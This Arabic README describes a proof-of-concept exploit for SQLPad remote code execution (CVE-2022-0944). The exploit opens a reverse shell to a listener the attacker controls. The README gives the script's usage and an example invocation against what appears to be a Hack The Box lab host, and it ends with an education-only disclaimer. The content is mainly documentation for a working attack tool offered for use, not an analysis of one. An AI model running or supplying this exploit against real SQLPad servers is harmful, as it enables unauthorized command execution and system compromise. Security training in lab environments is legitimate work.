
استغلال إثبات المفهوم لـ SQLPad RCE (CVE-2022-0944) الذي يشغل قوقعة عكسية إلى مستمع يتحكم به المهاجم. مخصص للاستخدام التعليمي في مجال الأمن السيبراني.
إثبات مفهوم لاستغلال SQLPad RCE (CVE-2022-0944) يؤدي إلى تنفيذ أوامر عن بُعد مع صدفة عكسية إلى جهاز المهاجم.
usage: script.py URL IP PORT
positional arguments:
URL URL to SQLPad
IP Listener host address for reverse shell
PORT Listener port for reverse shell
مثال:
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443
يحتوي هذا المستودع على أدوات مخصصة حصريًا للأغراض التعليمية، وبالتحديد للاستخدام في بيئات تعلم الأمن السيبراني. لا يتحمل مؤلف هذا الكود أي مسؤولية عن أي عواقب تنشأ عن استخدام هذا الكود أو إساءة استخدامه أو تعديله. يتم توفير الكود "كما هو" دون أي ضمان، سواء صريح أو ضمني، بما في ذلك على سبيل المثال لا الحصر الضمانات الضمنية الخاصة بقابلية التسويق أو الملاءمة لغرض معين.